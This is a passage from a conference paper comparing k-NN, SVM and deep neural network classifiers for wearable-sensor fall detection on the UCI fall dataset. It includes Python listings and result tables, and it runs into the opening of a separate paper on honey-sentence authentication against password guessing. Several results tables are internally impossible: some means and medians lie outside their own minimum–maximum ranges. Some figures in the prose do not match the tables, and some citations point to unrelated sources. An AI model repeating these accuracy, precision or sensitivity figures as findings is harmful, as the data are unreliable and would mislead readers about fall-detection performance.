Sensors are an integral part of any fall detection or fall prevention system. Typically, sensors for these systems are applied to the body directly or within devices that are worn or carried close to the body [12,22,30]. Sensors provide extensive opportunity to collect data for fall detection algorithms. These sensors are also located in medical devices and our everyday devices (e.g., smartphones, smartwatches, etc.) [24,26,31]. Typical sensors used in these devices include gyroscopes, accelerometers, and magnetometers which are essential for fall detection and prevention system operation [27,31].
Fig. 4. TELUS Health medical alert system: LivingWell Companion [17]
Wearable Sensors. Our review of fall detection systems includes two types of sensors: data acquisition sensors and fall detection sensors. Data acquisition sensors are used when running controlled tests of everyday movements and controlled falls. These data are then processed and used to find the mathematical formulas that give the best results when designing fall detection algorithms. The formulas are passed through a machine learning algorithm to classify the observation as a fall or not. Figure 5 presents a research-grade sensor for fall detection research and a commercially available fall detection pendant.
Fig. 5. Wearable sensor types: (a) data collection sensor [30]; (b) fall detection pendant [3]
Smart Devices (Phones and Watches). Smartphones and smartwatches are outfitted with accelerometers and gyroscopes, which are used to track a person’s movements in 3D environments [15]. The gyroscope measures movements across
3 axes and also includes the rotation about those axes, known as pitch, roll, and yaw. The accelerometer detects the acceleration along these three axes (Fig. 6). Data received from these sensors are used by machine learning algorithms to determine if a fall has occurred. Currently, researchers are exploring ways to train ML or Deep Learning algorithms to identify potential falls before they occur. State-of-the-art systems can predict a fall only about 100 ms before it occurs [27]. With so little advance notice, such systems hold little practical value; however, research groups around the world are exploring how to increase this advance warning through gait trend analysis coupled with other metrics such as cognitive decline and balance degradation [16].
Fig. 6. Accelerometers and gyroscopes in smartphones and smartwatches have been used in fall detection systems [15]
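As a rough illustration of how raw tri-axial samples can be turned into inputs for a classifier, the sketch below computes the acceleration magnitude of each sample and two simple features over a window. The function names, the sample values, and the choice of features are assumptions made for illustration; they are not taken from any of the systems reviewed here.

```python
import math


def magnitude(sample):
    """Return the Euclidean norm of one (x, y, z) sensor sample."""
    x, y, z = sample
    return math.sqrt(x * x + y * y + z * z)


def window_features(samples):
    """Summarize a window of (x, y, z) samples by peak and mean magnitude."""
    mags = [magnitude(s) for s in samples]
    return {"peak": max(mags), "mean": sum(mags) / len(mags)}


# Hypothetical accelerometer window in units of g: at rest, then a short spike.
window = [(0.0, 0.0, 1.0), (0.0, 0.0, 1.0), (3.0, 0.0, 4.0), (0.0, 0.0, 1.0)]
features = window_features(window)
print(features)
```

Features of this kind are orientation independent, which is one reason a magnitude is often preferred over a single axis when the device can be worn or carried in different positions.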
2.3 Fall Detection and Prevention Algorithms
The most common machine learning algorithms that have been used to analyze data to ascertain whether a fall has occurred are k-Nearest Neighbors (k-NN), Support Vector Machines (SVM) and Deep Neural Networks (DNN) [13,23,25]. Support Vector Machines and k-Nearest Neighbor algorithms execute quickly and perform well in terms of accuracy. DNNs require more time to train, but the models created often result in increased accuracy [31]. To train these systems, labelled fall datasets are used. These datasets may contain video frames, accelerometer or gyroscope data leading up to and including the fall. Such data are integral to training ML algorithms to classify scenarios as a “fall” or “not a fall”. Support Vector Machines, k-Nearest Neighbors and DNNs can all assign cases to these two defined groups. Support Vector Machines (SVM). A Support Vector Machine is a machine learning algorithm that is used in classification and regression problems [27]. The SVM algorithm classifies data that is plotted in an n-dimensional space based
on the number of features. It does this by creating hyperplanes between classes of plotted points. When using the SVM kernel technique, the kernel can be linear, polynomial, or Radial Basis Function (RBF) [27]. Figure 7 presents a visual representation of an SVM classifying data in 2D.
Fig. 7. An SVM trained with samples from two classes. The margin hyperplane is maximized and the samples on the margin are called Support Vectors [20]
The following listing presents the Support Vector Machine algorithm in Python:
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC
# x holds the feature matrix and y the fall / not-a-fall labels.
# Split the dataset into training and test datasets.
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20)
# Scale the features (the scaler is fitted on the training set only).
st_x = StandardScaler()
x_train = st_x.fit_transform(x_train)
x_test = st_x.transform(x_test)
# Support Vector Machine (classifier)
classifier = SVC(kernel='linear', random_state=0)
classifier.fit(x_train, y_train)
# Predict the test result
y_pred = classifier.predict(x_test)
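The kernel choice mentioned above can be compared empirically. The following is a minimal sketch on synthetic data generated with scikit-learn's `make_moons`; the dataset, the noise level, and the variable names are assumptions for illustration and are unrelated to the fall dataset used later in this paper.

```python
from sklearn.datasets import make_moons
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

# Synthetic two-class data that is not linearly separable (assumed stand-in).
X, y = make_moons(n_samples=400, noise=0.2, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.20, random_state=0
)

scores = {}
for kernel in ("linear", "poly", "rbf"):
    # Scale the features, then fit an SVM with the given kernel.
    model = make_pipeline(StandardScaler(), SVC(kernel=kernel, random_state=0))
    model.fit(X_train, y_train)
    scores[kernel] = model.score(X_test, y_test)

for kernel, accuracy in scores.items():
    print(f"{kernel}: test accuracy = {accuracy:.3f}")
```

Which kernel scores best depends on the data, so a comparison like this would need to be repeated on the real sensor features before drawing any conclusion.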
K-Nearest Neighbors (k-NN). The k-Nearest Neighbors algorithm is a popular machine learning algorithm that classifies a data point based on its k closest neighbors. k is an integer, typically odd and greater than 1 (for example 3, 5, or 7) so that votes between two classes cannot tie. The actual value is determined by experimentation and the accuracy of the results. The classification is determined by a distance function, Euclidean (Eq. 1), Manhattan (Eq. 2), or Minkowski (Eq. 3), measured from the data point to be classified to its k nearest neighbors [28].
$$\text{Euclidean distance: } d(x, y) = \sqrt{\sum_{i=1}^{n} (y_i - x_i)^2} \tag{1}$$
$$\text{Manhattan distance: } d(x, y) = \sum_{i=1}^{n} |x_i - y_i| \tag{2}$$
$$\text{Minkowski distance: } d(x, y) = \left( \sum_{i=1}^{n} |x_i - y_i|^{p} \right)^{1/p} \tag{3}$$
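The three distance functions are closely related: the Minkowski distance reduces to the Manhattan distance for p = 1 and to the Euclidean distance for p = 2. A minimal sketch of this relationship in plain Python follows; the function names are illustrative and do not come from the paper's code.

```python
def minkowski(x, y, p):
    """Minkowski distance of order p between two equal-length vectors."""
    if len(x) != len(y):
        raise ValueError("vectors must have the same length")
    return sum(abs(a - b) ** p for a, b in zip(x, y)) ** (1.0 / p)


def manhattan(x, y):
    """Manhattan distance: Minkowski with p = 1."""
    return minkowski(x, y, 1)


def euclidean(x, y):
    """Euclidean distance: Minkowski with p = 2."""
    return minkowski(x, y, 2)


a, b = [0.0, 0.0], [3.0, 4.0]
print(euclidean(a, b), manhattan(a, b))
```

Writing the special cases in terms of the general formula also mirrors how scikit-learn's `KNeighborsClassifier` exposes the choice, through `metric='minkowski'` and the parameter `p`.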
Figure 8 presents a visual representation of a k-NN classifier; the Python listing for the k-NN algorithm follows.
Fig. 8. Visualization of a k-NN classifier [28]
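# Data: training and test datasets (X_train, X_test, y_train, y_test)
# Result: fall classification (y_pred)
from sklearn.neighbors import KNeighborsClassifier
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
model_name = 'K-Nearest Neighbor Classifier'
# The original listing does not define preprocessorForFeatures;
# standard feature scaling is assumed here.
preprocessorForFeatures = StandardScaler()
# Minkowski distance with p=2 is the Euclidean distance.
knnClassifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)
knn_model = Pipeline(steps=[('preprocessor', preprocessorForFeatures), ('classifier', knnClassifier)])
knn_model.fit(X_train, y_train)
y_pred = knn_model.predict(X_test)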
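Since the value of k is chosen by experimentation, one common way to run that experiment is cross-validation over a few candidate values. The sketch below assumes synthetic data from scikit-learn's `make_classification` with 16 features as a stand-in for sensor data; the candidate list and the number of folds are also assumptions, not settings reported in this paper.

```python
from sklearn.datasets import make_classification
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler

# Synthetic binary data with 16 features (an assumed stand-in for sensor data).
X, y = make_classification(n_samples=300, n_features=16, random_state=0)

candidate_ks = [3, 5, 7]
mean_accuracy = {}
for k in candidate_ks:
    model = make_pipeline(StandardScaler(), KNeighborsClassifier(n_neighbors=k))
    # Mean 5-fold cross-validated accuracy for this value of k.
    mean_accuracy[k] = cross_val_score(model, X, y, cv=5).mean()

best_k = max(mean_accuracy, key=mean_accuracy.get)
print(mean_accuracy, "best k:", best_k)
```

Placing the scaler inside the pipeline means it is refitted on each training fold, so the held-out fold does not influence the scaling.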
Deep Neural Networks (DNN). Deep learning is a subset of machine learning. Deep Neural Networks (DNNs) are neural networks with three or more layers. DNNs attempt to simulate the behavior of the human brain, enabling them to “learn” from large amounts of data [7]. Neural networks have hidden layers that can help to optimize and refine the accuracy. Figure 9 presents a visual representation of a DNN; the Python listing for a DNN classifier follows.
Fig. 9. Deep neural network architecture
import tensorflow as tf
# Build the Sequential model; each input sample has 16 features.
model = tf.keras.Sequential([
    tf.keras.layers.Dense(200, input_shape=(16,)),
    tf.keras.layers.Dense(200, activation=tf.nn.relu),
    tf.keras.layers.Dense(1, activation='sigmoid')
])
# Compile the model
model.compile(optimizer='sgd', loss='mean_squared_error', metrics=['accuracy'])
# Train the model
model.fit(X_train, y_train, epochs=5000)
# Make a prediction (one sigmoid output per test sample)
print(model.predict(X_test))
3 Methodology
This section describes various aspects of the methodology including: a) Materials, b) Dataset, c) Program (Pre-Processing, and the ML algorithm), and d) Evaluation and Analysis techniques.
3.1 Materials
We implemented the k-NN, SVM, and Deep Neural Network ML algorithms in Python using scikit-learn and TensorFlow. The UCI open-source fall dataset, which comprises simulated falls and daily activities, was used to train and evaluate our algorithms [32]. The output of our classifiers was written to CSV files for post-analysis.
3.2 Dataset
The UCI dataset was used in this research. In this comprehensive, openly available fall dataset, 20 falls and 16 daily living activities were performed by 17 volunteers with 5 repetitions (3,060 instances) while wearing 6 sensors attached to their head, chest, waist, wrist, thigh and ankle [1]. The dataset is available at this site: https://archive.ics.uci.edu/ml/datasets/Simulated+Falls+and+Daily+Living+Activities+Data+Set#. Each movement was performed 5 to 6 times using 6 sensors. Each sensor file provided the following 23 features (columns of data): counter, body temperature, velocity (x, y, z), orientation (w, x, y, z), acceleration (x, y, z), gyroscope (x, y, z), magnetic field (x, y, z), pressure, roll, pitch, yaw, and RSSI (Received Signal Strength Indicator). The Xsens MTw sensor and development kit was used to acquire the data from the participants [1]. Figure 10 presents the file structure of the UCI fall dataset. The file structure is as follows:
• An overarching Tests folder
• Participant folders: 100 series for men; 200 series for women
• Testler Export holds all the movement folders
• Movement folders: 800 series are daily activities; 900 series are falls
• Test 1 through 6
• Text file, titled based on sensor number.
Fig. 10. File structure of the UCI fall dataset
3.3 Program
The Python program we created is divided into two scripts. The first performs the pre-processing, which retrieves the data from the sensor files and stores it in a multi-nested dictionary. The second script contains the code to configure, build, compile, train and test the ML classifiers. Pre-Processing Phase (Data Retrieval). In the pre-processing phase (data retrieval), the program loops through each main folder type in the file structure. The test number folder is opened and the requested sensor text file is passed as an argument to the function (see Fig. 11). The script makes a list of dictionaries whose keys are the column names inside the file. This list is then saved to a dictionary that uses the test number as a key. The test number dictionary is then saved to a dictionary keyed by test class. Lastly, the test class dictionary is saved to a dictionary keyed by tester. Nested dictionaries are used to facilitate searching for data by string keys instead of having to look through indexes. For example, a call to retrieve the data from the file is structured as follows:
data['101']['801 - Participant 1']['Test 1'][0]['Counter'] (4)
The line of code above is equivalent to opening the sensor text file for the first participant doing the first test of the movement exercises and extracting the starting count number.
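A nested, string-keyed structure of this kind can be sketched as follows. This is an illustration under stated assumptions rather than the script used in this work: the in-memory `records`, the simplified key strings, and the column name `Acc_X` are hypothetical, and reading the sensor text files from disk is omitted.

```python
from collections import defaultdict


def nested():
    """Create a dictionary whose missing keys become nested dictionaries."""
    return defaultdict(nested)


# Hypothetical records: (participant, movement, test, rows of sensor readings).
records = [
    ("101", "801", "Test 1", [{"Counter": 0, "Acc_X": 0.1}, {"Counter": 1, "Acc_X": 0.2}]),
    ("101", "901", "Test 1", [{"Counter": 0, "Acc_X": 2.5}]),
]

data = nested()
for participant, movement, test, rows in records:
    # Each leaf is a list of dictionaries keyed by column name.
    data[participant][movement][test] = rows

# Look up the first counter value by string keys rather than positional indexes.
first_counter = data["101"]["801"]["Test 1"][0]["Counter"]
print(first_counter)
```

One caveat of `defaultdict` is that reading a missing key silently creates it, so a plain `dict` with explicit checks may be preferable once the structure has been built.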
Fig. 11. Sensor data class
ML Classifiers. The following process was used for all three ML algorithms (k-NN, SVM, and DNN). The main script uses the three CSV files created by the pre-processing script to run the ML algorithm on the data. The script starts by opening all 3 files, saving the data into pandas DataFrames, and removing any clear anomalies and outliers. The script then makes 3 sets of data: a clean, normalized full dataset, from which the training and test sets are generated. Following conventional data science practices, the training set was 80% of the entire dataset, with the remaining 20% reserved for testing. From the full UCI dataset, the following 16 features were used by our ML algorithms for fall classification, namely: velocity (x, y, z), orientation (w, x, y, z), acceleration (x, y, z), gyroscope (x, y, z), roll, pitch, and yaw.
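The 80/20 split and the normalization step can be sketched as below. The random data, the array shapes, and the use of `stratify` are assumptions for illustration. Note also that this sketch fits the scaler on the training portion only, which is a common precaution against information leaking from the test set and may differ from the order of operations described above.

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(0)

# Hypothetical data: 1,000 samples with 16 features and a binary fall label.
X = rng.normal(size=(1000, 16))
y = rng.integers(0, 2, size=1000)

# Hold out 20% for testing; stratify to keep the class balance in both parts.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.20, stratify=y, random_state=0
)

# Fit the scaler on the training set only, then apply it to both sets.
scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)

print(X_train.shape, X_test.shape)
```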
E. R. Sykes
3.4 Evaluation and Analysis Techniques
The following types of quantitative analysis were performed: 1) evaluating and refining the classifiers using standard machine learning evaluation tools; and 2) determining the accuracy of the classifiers using statistical tools.

1. Computing confusion matrices: compare each classifier's accuracy at predicting a fall. Confusion matrices and the associated measures (accuracy, precision and sensitivity) are commonly used in the evaluation of machine learning algorithms; see [8, 9, 11, 18]. Statistics for each participant and each classifier model were collected, and confusion matrix derivations were computed as shown in Table 1.
2. Calculating standard descriptive statistics on the confusion matrix data for the entire group, including minimum, maximum, mean, median, standard deviation, accuracy, precision, and sensitivity.

Table 1. Confusion matrix derivations

True Positives (TP):    Classifier correctly identifies that it was a fall
True Negatives (TN):    Classifier correctly identifies that it was not a fall
False Negatives (FN):   Classifier did not identify the fall when it should have
False Positives (FP):   False alarm: classifier said it was a fall when it should not have
Accuracy:               (TP + TN) / (TP + TN + FP + FN)
Precision:              TP / (TP + FP)
Sensitivity:            TP / (TP + FN)
Specificity:            TN / (TN + FP)
Miss rate:              FN / (FN + TP)
False Positive Rate:    FP / (FP + TN)
F1 Score:               2TP / (2TP + FP + FN)

4 Analysis and Evaluation
Throughout our experiments we changed the values of the ML tuning parameters, namely, k for the k-NN, the distance calculations for the SVM, and the hyperparameters for the DNN. The results presented below are the best we were able to achieve in terms of accuracy, precision and sensitivity for each respective algorithm.
4.1 Statistical Analysis to Test the Classifiers
This section presents the statistical analysis that was performed to test the effectiveness of the classifiers. Numerous confusion matrix computations were performed including supporting statistical measures and summative standard descriptive statistics. The confusion matrices show the range of values (min, max, mean, median and standard deviation) across all participants. These computational results are shown in Tables 2, 3, 4, 5, 6, and 7 based on models created from training data sets.

Table 2. Primary confusion matrix results with supporting statistical measures and summative standard descriptive statistics for the K-NN algorithm

          True positive (%)   True negative (%)   False negative (%)   False positive (%)   Accuracy (%)
Min       2.993%              74.987%             1.503%               0.350%               68.111%
Max       9.125%              75.179%             5.729%               0.509%               78.497%
Mean      5.096%              72.069%             2.723%               0.113%               72.164%
Median    4.714%              72.598%             2.214%               0.042%               71.531%
Std Dev   1.912%              3.263%              1.377%               0.174%               1.386%
Table 3. Additional derived confusion matrix results for the K-NN algorithm

          Precision (%)   Sensitivity (%)   Specificity (%)   Miss Rate (%)   FPR (%)   F1-Score (%)
Min       71.667%         61.429%           69.448%           1.503%          0.570%    65.605%
Max       80.000%         73.239%           70.000%           5.889%          0.552%    64.553%
Mean      68.386%         65.847%           69.877%           2.836%          0.123%    68.774%
Median    69.920%         64.403%           69.957%           2.469%          0.044%    68.345%
Std Dev   2.900%          4.485%            0.190%            1.386%          0.190%    2.856%
Table 4. Primary confusion matrix results with supporting statistical measures and summative standard descriptive statistics for the SVM algorithm

          True Positive (%)   True Negative (%)   False Negative (%)   False Positive (%)   Accuracy (%)
Min       0.452%              83.534%             1.030%               0.632%               83.633%
Max       1.539%              88.733%             6.630%               0.848%               88.643%
Mean      0.642%              86.237%             2.553%               0.122%               87.359%
Median    0.742%              87.251%             2.363%               0.510%               87.536%
Std Dev   0.632%              1.363%              1.363%               0.036%               1.553%
Table 5. Additional derived confusion matrix results for the SVM algorithm

          Precision (%)   Sensitivity (%)   Specificity (%)   Miss Rate (%)   FPR (%)   F1-Score (%)
Min       85.309%         8.643%            89.202%           1.626%          0.026%    15.635%
Max       90.740%         39.356%           90.735%           6.275%          0.634%    56.218%
Mean      93.645%         24.752%           89.843%           2.105%          0.062%    38.871%
Median    89.68%          23.235%           89.736%           2.602%          0.064%    38.502%
Std Dev   8.862%          9.735%            0.072%            1.702%          0.062%    12.068%
Table 6. Primary confusion matrix results with supporting statistical measures and summative standard descriptive statistics for the DNN algorithm

          True Positive (%)   True Negative (%)   False Negative (%)   False Positive (%)   Accuracy (%)
Min       0.526%              93.632%             1.592%               0.025%               91.593%
Max       1.642%              94.102%             6.205%               0.204%               94.499%
Mean      0.759%              92.842%             2.591%               0.064%               92.591%
Median    0.752%              95.942%             2.695%               0.052%               93.042%
Std Dev   0.692%              1.734%              1.264%               0.052%               1.462%
Table 7. Additional derived confusion matrix results for the DNN algorithm

          Precision (%)   Sensitivity (%)   Specificity (%)   Miss Rate (%)   FPR (%)   F1-Score (%)
Min       75.525%         8.254%            94.482%           1.152%          0.053%    15.592%
Max       97.252%         39.252%           96.542%           6.584%          0.254%    56.539%
Mean      90.525%         24.694%           94.359%           2.285%          0.064%    38.812%
Median    91.652%         23.528%           93.964%           2.592%          0.025%    38.053%
Std Dev   8.624%          9.264%            0.069%            1.654%          0.052%    12.253%
For our implementation using k-NN, as shown in Tables 2 and 3, on average 5.096% of results were true positives, 72.069% true negatives, 2.723% false negatives, and 0.113% false positives. The system exhibited a mean accuracy of 72.164%, precision of 68.386%, sensitivity of 64.847%, specificity of 69.877%, miss rate of 2.836%, false positive rate of 0.123%, and an F1-score of 68.774%.

Our results using the SVM are presented in Tables 4 and 5, which show that on average 0.642% of results were true positives, 86.237% true negatives, 2.553% false negatives, and 0.122% false positives. The system exhibited a mean accuracy of 87.359%, precision of 93.645%, sensitivity of 24.235%, specificity of 89.843%, miss rate of 2.105%, false positive rate of 0.062%, and an F1-score of 38.871%.

Our Deep Neural Network outperformed the k-NN and SVM; these results are shown in Tables 6 and 7. These tables show that on average 0.759% of results were true positives, 92.842% true negatives, 2.591% false negatives, and 0.064% false positives. The system exhibited a mean accuracy of 92.591%, precision of 90.525%, sensitivity of 24.694%, specificity of 94.359%, miss rate of 2.285%, false positive rate of 0.064%, and an F1-score of 38.812%.
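For readers who wish to reproduce the derived measures, the confusion matrix derivations of Table 1 can be sketched as below. The function name and the counts are hypothetical and are not taken from the experiments; specificity is computed in its standard form TN / (TN + FP).

```python
def confusion_metrics(tp, tn, fp, fn):
    """Derive the standard measures from the four confusion-matrix counts."""
    total = tp + tn + fp + fn
    return {
        "accuracy": (tp + tn) / total,
        "precision": tp / (tp + fp),
        "sensitivity": tp / (tp + fn),
        "specificity": tn / (tn + fp),
        "miss_rate": fn / (fn + tp),
        "false_positive_rate": fp / (fp + tn),
        "f1_score": 2 * tp / (2 * tp + fp + fn),
    }


# Hypothetical counts for one participant (illustration only).
metrics = confusion_metrics(tp=40, tn=900, fp=10, fn=50)
```

With counts like these, accuracy is high while sensitivity stays below one half, because non-fall samples dominate the data. A similar gap between accuracy and sensitivity appears in the mean SVM and DNN results reported above.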
5 Discussion
Our research showed that waist and chest sensors are optimal for fall detection. This is primarily due to the accuracy that can be achieved when algorithms analyze and learn from the accelerometer and gyroscope data. Our findings also revealed that a device intended to detect falls should ideally be placed on the waist, then the chest, and finally the wrist. Using smartphones in combination with smartwatches as data collection sources could surpass the current detection systems of pendants and other sensors [5,31]. As smartwatches become more ubiquitous, they could be equipped with an auto-tracking system jointly with a paired smartphone. These new tracking systems have the potential to be more accurate, as they would be able to track an unintentional trip or fall in real time by leveraging the combined data collected from multiple sensors on both devices [19].

Another related area of development is smart clothing, that is, clothes with sensors embedded within the fabric. These garments are equipped with sensors such as ECG, EMG, temperature, HR, BP, SpO2, pressure sensors (e.g., smart socks), accelerometers, gyroscopes, etc. Although still primarily in the research realm, a few companies are producing smart clothing for the consumer (e.g., Hexoskin, Sensoria, etc.). For example, Fig. 12 presents a new SmartSock by Sensoria [29]. This sock has several pressure sensors embedded within its fabric, which provide information that is useful for determining balance issues, pressure strikes, gait analysis, etc. This data would be significant for new fall detection and fall prevention systems.
Fig. 12. Sensoria sock - with embedded pressure sensors [16]
As these garments gain popularity and prevalence within people’s daily attire, opportunities to provide even better fall detection and prevention algorithms will emerge. Despite the substantial amount of work that has been conducted in this area, more research is needed, particularly empirical studies.
6 Conclusion
After the analysis of nearly ten thousand sensor files, as collected from the wrist, waist and chest, the waist sensor was noted as having the highest accuracy, whereas the wrist had the least. With more efficient methods of collecting data and fall detection and prevention algorithms, the accuracy of fall detection and prevention systems will increase.
In summary, the main contributions of this work are:
1. a critical review of current fall detection and prevention systems that are commercially available,
2. a comparison of three commonly used Machine Learning algorithms (k-NN, SVM, and DNN) for fall detection; our Deep Neural Network model achieved an accuracy of 92.591% at correctly detecting a fall,
3. recommendations for new fall detection and prediction systems. Combining the data from both a sensor in a smartwatch on the wrist and a smartphone at the waist can provide real-time data that can then be used in superior fall prevention algorithms.

6.1 Future Work
New fall detection and prediction systems should draw from all available information, including smartphones and smartwatches, real-time sensor data (accelerometers, gyroscopes, pressure sensors), and vitals (such as ECG, EMG, HR, BP, SpO2, etc.) collected via smart clothing (e.g., smart socks with embedded pressure sensors, leggings that detect muscle activation and imbalances, etc.). Furthermore, patient data such as medications, allergies, other medical conditions and historic trends should be incorporated in the dataset. Collectively, this data can be used by machine learning algorithms to learn patterns that precede falls. The aim of an AI fall prevention system is to provide as much advance warning as possible when a fall is imminent. A key to future fall prediction systems will be smart clothing. As smart clothes with embedded sensors become increasingly affordable, comfortable, reliable, and sophisticated (in terms of data collection, processing and potentially some degree of analysis), people will start wearing them on a daily basis. When this occurs, practical, effective, consumer-based fall detection systems will emerge. Through appropriate advance warning notifications, they will have a significant impact on improving the lives of those who have a predisposition to falls and of those who care for them.

Acknowledgements. We would like to extend our gratitude to the Natural Sciences and Engineering Research Council of Canada (NSERC) for the resources to conduct this research. A special thanks to Patrick Ouellette for his contributions to this work.
References
1. Simulated falls and daily living activities data set. UCI Machine Learning Repository
2. Galaxy medical alert system review. Seniors Bulletin Canada (2021)
3. Home system with fall detection. Galaxy Medical Alert Systems, Mar 2021
4. Securmedic review. Seniors Bulletin Canada (2021)
5. Abobakr, A., Hossny, M., Nahavandi, S.: A skeleton-free fall detection system from depth images using random decision forest. IEEE Syst. J. 12(3), 2994–3005 (2018)
6. Adhikari, K., Bouchachia, H., Nait-Charif, H.: Deep learning based fall detection using simplified human posture. Int. J. Comput. Syst. Eng. 13(5), 255–260 (2019)
7. Fiona, C.B.: World health organization 2020 guidelines on physical activity and sedentary behaviour. Br. J. Sports Med. 54(24), 1451–1462 (2020)
8. Elkan, C.: Evaluating classifiers (2012)
9. Forman, G., Scholz, M.: Apples-to-apples in cross-validation studies. ACM SIGKDD Explor. Newsl. 12, 11 (2010)
10. Statistics Canada, Government of Canada: Health at a glance, Nov 2015
11. Hamilton, H.J.: Confusion matrix (2011). Accessed 05 Dec 2019
12. Jian, H., Zihao, Z., Weiguo, Y.: Interrupt-driven fall detection system realized via a Kalman filter and KNN algorithm, pp. 579–584, October 2019
13. Horng, G.-J., Chen, K.-H.: The smart fall detection mechanism for healthcare under free-living conditions. Wireless Pers. Commun. 118(1), 715–753 (2021). https://doi.org/10.1007/s11277-020-08040-4
14. Huang, Z., Liu, Y., Fang, Y., Horn, B.K.: Video-based fall detection for seniors with human pose estimation. In: 4th International Conference on Universal Village, IEEE (2019)
15. Jakeman, R.: Best smartwatches 2023: Which? Best buys and expert buying advice (2023). https://www.which.co.uk/reviews/smartwatches/article/bestsmartwatches-abRh50p0riUM, 20 Jan 2023
16. Jeudy, L.: Canada: population, by gender and age 2021. Statista, December 2021
17. Telus Health: Telus health livingwell companion review. Seniors bulletin (2022). https://seniorsbulletin.ca/telus-health-livingwell-companion-review/, 12 Dec 2022
18. Kohavi, R., Provost, F.: Glossary of terms. Special issue of applications of machine learning and the knowledge discovery process. Mach. Learn. 30, 271–274 (1998)
19. Adhikari, K., Bouchachia, H., Nait-Charif, H.: Long short-term memory networks based fall detection using unified pose estimation, pp. 236–240 (2019)
20. Larhmam, T.: Support vector machine (2022)
21. Lee, J.-S., Tseng, H.-H.: Development of an enhanced threshold-based fall detection system using smartphones with built-in accelerometers. IEEE Sens. J. 19(18), 8293–8302 (2019)
22. Liang, S., Chu, T., Lin, D., Ning, Y., Li, H., Zhao, G.: Pre-impact alarm system for fall detection using MEMS sensors and HMM-based SVM classifier, vol. 2018, pp. 4401–4405 (2018)
23. Nizam, Y., Mohd, M.N.H., Jamil, M.M.A.: Human fall detection from depth images using position and velocity of subject. Procedia Comput. Sci. 105, 131–137 (2017). 2016 IEEE International Symposium on Robotics and Intelligent Sensors, IRIS 2016, Tokyo, Japan, 17-20 December 2016
24. Pang, Z., Zheng, L., Tian, J., Kao-Walter, S., Dubrova, E., Chen, Q.: Design of a terminal solution for integration of in-home health care devices and services towards the internet-of-things. Enterp. Inf. Syst. 9, 86–116 (2019)
25. Phillips, D.R., Gyasi, R.M.: Global aging in a comparative context. The Gerontologist (2020)
26. Solbach, M.D., Tsotsos, J.K.: Vision-based fallen person detection for the elderly. In: IEEE International Conference on Computer Vision, pp. 1433–1442. IEEE (2019)
27. Noble, W.: What is a support vector machine? Nat. Biotechnol. 24, 1565–1567 (2006). https://doi.org/10.1038/nbt1206-1565
28. Tavish, M.: K nearest neighbor: KNN algorithm: KNN in Python & R. Analytics Vidhya, October 2020
29. Vigano, D.: Sensoria artificial intelligence sportswear (2022)
30. Shao, Y., Wang, X., Song, W., Ilyas, S., Guo, H., Chang, W.-S.: Feasibility of using floor vibration to detect human falls. Int. J. Environ. Res. Public Health 18(1), 200–206 (2021)
31. Luo, K., Chen, Y., Du, R., Xiao, Y.: Fall detection system based on real-time pose estimation and SVM, pp. 990–993 (2021)
32. Özdemir, A.T., Barshan, B.: Detecting falls with wearable sensors using machine learning techniques. Sensors 14, 10691–10708 (2014)
Authentication Scheme Using Honey Sentences
Nuril Kaunaini Rofiatunnajah and Ari Moesriami Barmawi
School of Computing, Telkom University, Bandung, Indonesia
[email protected], [email protected]
Abstract. Password-based authentication has dominated authentication schemes for decades because of its usability. However, password-based authentication is vulnerable to password-guessing attacks. To mitigate this attack, users have to choose a good password that is hard to guess. However, a password that is secure enough against password-guessing attacks will be difficult for users to memorize. One of the prior works that increases the complexity of password-guessing attacks without decreasing usability is honey encryption (HE). HE produces a fake, plausible-looking plaintext as a decoy message when the attacker guesses an incorrect password. Some research has implemented HE in an authentication scheme. However, authentication schemes using HE have some weaknesses. The decoy message uses just one word and still looks suspicious to the attacker. All of the decoy messages also have to be stored in the database. To address these problems, we propose an authentication system that uses honey sentences instead of a word as the confirmation message. A honey sentence is dynamically generated using natural language and has to be natural enough to fool the attacker. When the attacker inputs an incorrect password, a honey sentence is returned to the attacker, such that he cannot determine the correctness of the guessed password. The experimental results showed that 80.67% of the generated sentences are considered natural, and that the complexity of finding the correct password from all possible passwords is higher than in the previous methods.

Keywords: Authentication · Honey Sentences · Password-guessing Attack
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 521–540, 2023. https://doi.org/10.1007/978-3-031-28073-3_37

1 Introduction

Despite having more security flaws than other authentication methods, password-based authentication has dominated authentication schemes for decades. Password-based authentication is still used because of its usability [1]. Users expect an authentication system that is scalable, easy to learn, places little burden on memory, and requires nothing to carry. However, the security flaws of user passwords continue to be a significant concern.

Password-based authentication is familiar to users but is vulnerable to password-guessing attacks. A password-guessing attack is an attack scenario in which the attacker attempts to gain access to legitimate users’ resources by guessing all possible passwords [2]. The attacker generates all the password combinations based on the password space, a user-defined dictionary, or users’ personal information to find the correct password. To mitigate this attack, users have to choose a good password that is hard to guess. However, higher security usually means lower usability. A password that is secure enough against password-guessing attacks will be difficult for users to memorize.

One of the prior works that increases the complexity of password-guessing attacks without decreasing usability is honey encryption [3]. Honey Encryption (HE) produces a “honey message” when the attacker guesses an incorrect password. A “honey message” is a fake, plausible-looking plaintext that makes the attacker believe that he entered the correct password. The attacker is therefore unable to confirm which password in the guessed password list is correct, so password-guessing attacks are hard to perform. With this method, users can still create the password they desire without security concerns.

One authentication scheme that implements HE is the secure PIN authentication for Java smart cards by Mohammed [4]. This method prevents password-guessing attacks by limiting the number of login attempts and creating multiple honey data. The honey data is fake data with the same type of information as that stored in the smart card. If the login limit is reached, honey data is returned. This makes the attacker believe that he successfully retrieved the correct data. However, this research does not mention how to create the fake data, and all of the fake data is stored in the smart card, so the complexity of the security is limited to the number of fake data items that can be stored.

